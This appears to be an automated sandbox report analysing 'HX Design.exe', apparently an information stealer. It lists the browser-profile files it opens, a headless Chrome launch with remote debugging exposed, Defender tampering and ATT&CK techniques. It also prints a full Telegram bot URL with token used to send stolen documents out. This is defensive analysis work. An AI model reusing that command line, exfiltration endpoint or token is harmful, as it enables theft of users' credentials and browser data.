              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
              Source: Yara matchFile source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com
              Source: Yara matchFile source: 00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Native API
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              31
              Disable or Modify Tools
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol2
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager47
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive21
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login HookLogin Hook21
              Obfuscated Files or Information
              NTDS141
              Security Software Discovery
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeylogging3
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp
              Cached Domain Credentials41
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture4
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Masquerading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Modify Registry
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
              Virtualization/Sandbox Evasion
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Access Token Manipulation
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
              Process Injection
              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579227 Sample: HX Design.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 76 api.telegram.org 2->76 78 blank-zlvej.in 2->78 80 2 other IPs or domains 2->80 94 Suricata IDS alerts for network traffic 2->94 96 Found malware configuration 2->96 98 Multi AV Scanner detection for submitted file 2->98 102 18 other signatures 2->102 11 HX Design.exe 68 2->11         started        14 svchost.exe 2->14         started        signatures3 100 Uses the Telegram API (likely for C&C communication) 76->100 process4 dnsIp5 64 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->64 dropped 66 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->66 dropped 68 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->68 dropped 70 58 other files (none is malicious) 11->70 dropped 17 HX Design.exe 8 11->17         started        84 127.0.0.1 unknown unknown 14->84 file6 process7 dnsIp8 72 ip-api.com 208.95.112.1, 49741, 49759, 80 TUT-ASUS United States 17->72 74 api.telegram.org 149.154.167.220, 443, 49760 TELEGRAMRU United Kingdom 17->74 86 Found many strings related to Crypto-Wallets (likely being stolen) 17->86 88 Tries to harvest and steal browser information (history, passwords, etc) 17->88 90 Modifies Windows Defender protection settings 17->90 92 3 other signatures 17->92 21 cmd.exe 1 17->21         started        24 cmd.exe 1 17->24         started        26 cmd.exe 17->26         started        28 26 other processes 17->28 signatures9 process10 signatures11 104 Suspicious powershell command line found 21->104 106 Uses cmd line tools excessively to alter registry or file data 21->106 108 Encrypted powershell cmdline option found 21->108 114 2 other signatures 21->114 30 powershell.exe 23 21->30         started        33 conhost.exe 21->33         started        110 Modifies Windows Defender protection settings 24->110 112 Removes signatures from Windows Defender 24->112 35 powershell.exe 23 24->35         started        47 2 other processes 24->47 37 powershell.exe 26->37         started        40 conhost.exe 26->40         started        42 rar.exe 28->42         started        44 chrome.exe 28->44         started        49 46 other processes 28->49 process12 dnsIp13 116 Loading BitLocker PowerShell Module 30->116 51 WmiPrvSE.exe 30->51         started        58 C:\Users\user\AppData\...\33ajg45c.cmdline, Unicode 37->58 dropped 53 csc.exe 37->53         started        60 C:\Users\user\AppData\Local\Temp\WE9Ml.zip, RAR 42->60 dropped 82 www.google.com 142.250.181.132, 443, 49752, 49753 GOOGLEUS United States 44->82 file14 signatures15 process16 file17 62 C:\Users\user\AppData\Local\...\33ajg45c.dll, PE32 53->62 dropped 56 cvtres.exe 53->56         started        process18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              HX Design.exe50%VirustotalBrowse
              HX Design.exe39%ReversingLabsWin64.Trojan.Znyonm
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI75082\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-fibers-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\ucrtbase.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pyd0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.210.172
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  www.google.com
                  142.250.181.132
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      blank-zlvej.in
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocumentfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/Blank-c/BlankOBFHX Design.exe, 00000001.00000003.1698834268.00000294B4E5A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1699569937.00000294B4730000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://anglebug.com/4836Mchrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://anglebug.com/6439schrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                http://anglebug.com/4633chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://anglebug.com/7382chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://issuetracker.google.com/284462263msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.chambersign.org1msedge.exe, 0000003B.00000002.1925230365.000076D800058000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.comLh#msedge.exe, 0000003B.00000002.1920928232.00004C6800238000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-fileHX Design.exe, 00000001.00000003.2097242552.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B482E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B482C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000003C.00000003.1871820820.00000298F7AFF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
